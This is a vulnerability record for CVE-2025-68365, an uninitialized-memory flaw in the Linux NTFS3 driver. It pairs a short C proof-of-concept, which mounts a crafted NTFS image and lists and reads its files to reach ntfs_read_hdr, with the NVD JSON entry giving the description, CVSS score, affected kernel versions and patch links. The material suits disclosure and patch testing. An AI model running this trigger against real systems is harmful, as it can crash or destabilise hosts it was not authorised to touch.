CVE-2025-68365

// CVE-2025-68365 PoC - Trigger uninitialized memory in NTFS3 ntfs_read_hdr // This PoC demonstrates the vulnerability by mounting a crafted NTFS image // Requires: Linux kernel with NTFS3 support enabled #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/mount.h> #include <errno.h> /* * To trigger this vulnerability: * 1. Build kernel with KMSAN enabled * 2. Create a malicious NTFS filesystem image * 3. Mount it using NTFS3 driver * 4. Trigger ntfs_read_hdr() by reading directory entries * * The vulnerability occurs because: * - __getname() allocates memory via kmem_cache_alloc() * - This memory is used before being zeroed * - kmsan reports uninit-value in ntfs_read_hdr and bcmp */ int trigger_ntfs3_vulnerability(const char *ntfs_image_path) { const char *mount_point = "/tmp/ntfs_test_mount"; int ret; // Create mount point mkdir(mount_point, 0755); // Mount NTFS image using NTFS3 driver // This will trigger ntfs_read_hdr() when reading directory entries ret = mount(ntfs_image_path, mount_point, "ntfs3", 0, NULL); if (ret != 0) { fprintf(stderr, "Mount failed: %s\n", strerror(errno)); return -1; } // Trigger directory listing which calls ntfs_read_hdr system("ls -la /tmp/ntfs_test_mount/"); // Read files to trigger more ntfs_read_hdr calls system("find /tmp/ntfs_test_mount -type f -exec cat {} \; 2>/dev/null"); // Unmount umount(mount_point); rmdir(mount_point); return 0; } int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "Usage: %s <ntfs_image_path>\n", argv[0]); return 1; } return trigger_ntfs3_vulnerability(argv[1]); }

{"cve": {"id": "CVE-2025-68365", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-12-24T11:16:00.063", "lastModified": "2026-02-26T18:44:18.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Initialize allocated memory before use\n\nKMSAN reports: Multiple uninitialized values detected:\n\n- KMSAN: uninit-value in ntfs_read_hdr (3)\n- KMSAN: uninit-value in bcmp (3)\n\nMemory is allocated by __getname(), which is a wrapper for\nkmem_cache_alloc(). This memory is used before being properly\ncleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to\nproperly allocate and clear memory before use."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15", "versionEndExcluding": "5.15.199", "matchCriteriaId": "3F9487DA-0705-4945-A8B3-1460DE840D0A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.162", "matchCriteriaId": "6579E0D4-0641-479D-A4C3-0EF618798C55"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.122", "matchCriteriaId": "8EAAE395-0162-4BAF-9AD5-E9AF3C869C4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.68", "matchCriteriaId": "52F38E19-0FDD-4992-9D6D-D4169D689598"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.2", "matchCriteriaId": "BD6A474E-1AF3-4675-9A46-086E5D8F61CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/192e8ce302f14ac66259231dd10cede19858d742", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7d52c592cf53f5bb7163967edc01d2d7d80de44a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a58e29849aef8d26554a982989a2190b49aaf8ed", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a8a3ca23bbd9d849308a7921a049330dc6c91398", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bdf38063fd15f2fc7361dc0b5d3c259741eab835", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f7728057220cabd720e27e46097edad48e5bd728", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}